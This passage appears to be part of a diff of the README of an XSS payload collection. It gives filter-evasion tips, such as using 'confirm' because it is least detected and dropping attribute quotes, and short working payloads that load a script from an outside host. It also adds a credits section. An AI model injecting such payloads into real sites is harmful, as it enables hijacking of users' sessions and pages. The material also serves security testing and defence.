s0md3v/AwesomeXSS/README.md

 - I have found that **confirm** is the least detected pop-up function so stop using alert.
 - Quotes around attribute value aren't neccessary.
 You can use **&lt;script src=//14.rs&gt;** instead of **&lt;script src="//14.rs"glt;**
 - The shortest independent payload is **&lt;embed src=//14.rs&gt;** (19 chars)

+## Credits and all that
+All the payloads are crafted by me unless specified.
+Thanks to my big brother [Rodolfo Assis](https://twitter.com/brutelogic) whose writings inspired me to become an XSSLord.